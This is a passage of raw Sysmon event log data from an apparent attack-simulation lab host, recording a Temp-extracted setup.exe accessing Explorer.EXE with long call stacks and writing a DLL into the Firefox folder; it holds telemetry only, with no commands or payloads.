13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-crt-math-l1-1-0.dll2021-01-18 13:59:52.192 10341000x800000000000000014417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.